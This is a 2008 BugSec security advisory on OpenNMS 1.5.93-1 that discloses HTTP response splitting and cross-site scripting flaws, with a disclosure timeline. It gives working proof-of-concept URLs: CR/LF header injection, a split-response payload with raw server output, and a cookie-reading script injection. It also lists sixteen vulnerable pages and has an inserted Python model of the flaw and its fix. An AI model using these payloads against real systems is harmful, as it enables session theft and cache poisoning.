opennms-xss.txt

Reported 07 Oct 2008 by Moshe BA, via packetstorm (packetstormsecurity.com)

OpenNMS Multiple Vulnerabilities including HTTP Response Splitting and Cross-Site Scripting

OpenNMS Multiple Vulnerabilities  
  
BugSec | Security Advisory  
Moshe Ben-Abu | Security Expert  
  
Advisory URL (PDF):  
http://www.bugsec.com/up_files/OpenNMS_Multiple_Vulnerabilities.pdf  
  
  
- Table of Contents -  
  
OPENNMS MULTIPLE VULNERABILITIES  
  Vendor  
  Application Description  
  OpenNMS HTTP Response Splitting Vulnerability  
    Vulnerability Information  
    Vulnerability Details  
    Proof-of-Concept  
  OpenNMS Cross-Site Scripting Vulnerabilities  
    Vulnerability Information  
    Vulnerability Details  
    Proof-of-Concept  
  Security Analysis  
    Discovery  
    Disclosure Timeline  
  About BugSec LTD.  
  References  
  
  
  
Vendor  
OpenNMS Group – http://www.opennms.com  
OpenNMS Project – http://www.opennms.org  
  
Application Description  
“OpenNMS is the world's first enterprise grade network management platform developed under the open source model. It consists of a community supported open-source project as well as a commercial services, training, and support organization.” - From OpenNMS Project website.  
  
  
OpenNMS HTTP Response Splitting Vulnerability  
Vulnerability Information  
Remotely exploitable: Yes  
Locally exploitable: No  
Affected versions:  
OpenNMS 1.5.93-1  
Other versions may also be affected.  
  
Vulnerability Details  
An input validation problem exists within OpenNMS which allows injecting CR (carriage return - %0D or \r) and LF (line feed - %0A or \n) characters into the server HTTP response header, resulting in an HTTP Response Splitting[1] vulnerability.  
  
This vulnerability is possible because the application fails to validate user-supplied input, returning it unsanitized within the server HTTP response header back to the client. This not only gives attackers control of the remaining headers and body of the server response, but also allows them to create additional responses entirely under their control.  
  
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, and influence or misrepresent how web content is served, cached, or interpreted. Other attacks are also possible.  
  
  
Proof-of-Concept  
  
Header injection  
http://server/opennms/event/query?%0D%0AInjectedHeader:%20BugSec  
  
Server response  
HTTP/1.1 302 Moved Temporarily  
Date: Thu, 25 Sep 2008 11:30:05 GMT  
Server: Apache/2.2.3  
Location: http://server/opennms/event/list?  
InjectedHeader: BugSec=  
Content-Length: 0  
Connection: close  
Content-Type: text/plain; charset=UTF-8  
  
  
HTTP Response Splitting  
http://server/opennms/event/query?%0D%0AContent-Length:%200%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/html%0D%0AContent-Length:%2036%0D%0A%0D%0A<html><body>BugSec</body></html><!--  
  
Server response  
HTTP/1.1 302 Moved Temporarily  
Date: Thu, 25 Sep 2008 11:35:20 GMT  
Server: Apache/2.2.3  
Location: http://server/opennms/event/list?  
Content-Length: 0  
  
HTTP/1.1 200 OK  
Content-Type: text/html  
Content-Length: 36  
  
<html><body>BugSec</body></html><!--=  
Content-Length: 0  
Connection: close  
Content-Type: text/plain; charset=UTF-8  
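
The mechanics behind the response shown above, as an added example that is not part of the original advisory: a Python model of the 302 redirect that echoes the decoded query string straight into Location (the vulnerable behaviour) beside a form that percent-encodes it first, plus a Content-Length-honouring splitter that shows why a client or cache sees two responses in the first case and one in the second. The response layout and the query come from the advisory's PoC; the language and function names are my own assumptions.

```python
"""Model of the OpenNMS redirect and of how a downstream parser splits it."""
from __future__ import annotations
from urllib.parse import quote, unquote

# The advisory's PoC query as the server sees it after URL-decoding
# (%0D%0A has already become CR LF). Constructed from the PoC URL above.
POC_QUERY = unquote(
    "%0D%0AContent-Length:%200%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0A"
    "Content-Type:%20text/html%0D%0AContent-Length:%2036%0D%0A%0D%0A"
    "<html><body>BugSec</body></html><!--"
)


def build_redirect(query: str, encode: bool) -> bytes:
    """Build the 302 the advisory shows. encode=False reproduces the
    vulnerable behaviour: the decoded query is echoed raw into Location
    (with '=' appended for a value-less parameter, as in the PoC output).
    encode=True is the fix: percent-encode before placing it in a header,
    so CR/LF can never terminate the header line."""
    value = quote(query, safe="") if encode else query
    return (
        "HTTP/1.1 302 Moved Temporarily\r\n"
        "Server: Apache/2.2.3\r\n"
        f"Location: http://server/opennms/event/list?{value}=\r\n"
        "Content-Length: 0\r\n"
        "Connection: close\r\n"
        "Content-Type: text/plain; charset=UTF-8\r\n"
        "\r\n"
    ).encode("latin-1")


def split_responses(raw: bytes) -> list[tuple[bytes, dict[bytes, bytes], bytes]]:
    """Parse a byte stream the way a Content-Length-honouring client or
    cache does: status line, headers, blank line, exactly Content-Length
    body bytes, then the next message starts. Returns (status, headers, body)
    per message; stops at trailing bytes that are not a status line."""
    messages: list[tuple[bytes, dict[bytes, bytes], bytes]] = []
    pos = 0
    while (end := raw.find(b"\r\n\r\n", pos)) >= 0:
        status, *header_lines = raw[pos:end].split(b"\r\n")
        if not status.startswith(b"HTTP/"):
            break  # leftover junk such as '=\r\nContent-Length: 0...' in the PoC
        headers: dict[bytes, bytes] = {}
        for line in header_lines:
            name, _, val = line.partition(b":")
            headers[name.strip().lower()] = val.strip()
        length = int(headers.get(b"content-length", b"0"))
        body = raw[end + 4:end + 4 + length]
        messages.append((status, headers, body))
        pos = end + 4 + length
    return messages
```

Run `split_responses(build_redirect(POC_QUERY, encode=False))` to see the injected 200 response appear as a second message; the encoded form yields exactly one 302 whose own Connection and Content-Type headers are intact.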
  
  
  
OpenNMS Cross-Site Scripting Vulnerabilities  
Vulnerability Information  
Remotely exploitable: Yes  
Locally exploitable: No  
Affected versions:  
OpenNMS 1.5.93-1  
Other versions may also be affected.  
  
Vulnerability Details  
An input validation problem exists within OpenNMS which allows execution of arbitrary client-side code, resulting in a cross-site scripting vulnerability.  
  
An attacker may leverage a cross-site scripting vulnerability to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.  
  
Proof-of-Concept  
surveillanceView.htm - viewName  
http://server/opennms/surveillanceView.htm?viewName=<script>alert(document.cookie)</script>  
  
  
Vulnerable pages  
http://server/opennms/asset/modifyAsset  
http://server/opennms/distributedStatusDetails.htm  
http://server/opennms/distributedStatusHistory.htm  
http://server/opennms/event/query  
http://server/opennms/graph/adhoc2.jsp  
http://server/opennms/graph/chooseresource.htm  
http://server/opennms/graph/results.htm  
http://server/opennms/ksc/customView.htm  
http://server/opennms/ksc/formProcMain.htm  
http://server/opennms/notification/browse  
http://server/opennms/notification/list.jsp  
http://server/opennms/outage/list  
http://server/opennms/rtc/category.jsp  
http://server/opennms/statisticsReports/index.htm  
http://server/opennms/statisticsReports/report.htm  
http://server/opennms/surveillanceView.htm  
  
  
Security Analysis  
Discovery  
Moshe Ben-Abu  
BugSec LTD. - Security Consulting Company  
http://www.bugsec.com  
  
  
Disclosure Timeline  
25/09/2008 – BugSec Security Team notifies OpenNMS team about security vulnerabilities discovered in OpenNMS, sending security advisory draft.  
25/09/2008 – Vendor acknowledgment notification.  
26/09/2008 – OpenNMS 1.5.94 released, fixing HTTP response splitting vulnerability but not the cross-site scripting vulnerabilities.  
01/10/2008 – OpenNMS 1.5.96 released, fixing cross-site scripting vulnerabilities.  
05/10/2008 – Advisory released.  
  
  
About BugSec LTD.  
BugSec Services provides IT & Application Security services for large-scale organizations, including Penetration Testing, Risk Assessments, Secure Code Development and Guidance.  
  
BugSec Solutions develops innovative products and tools that give focused solutions to systems data security issues, such as Web Application Security, Secure Coding and Anti-Phishing solutions.  
  
  
  
References  
[1] “HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics” by Amit Klein, http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf  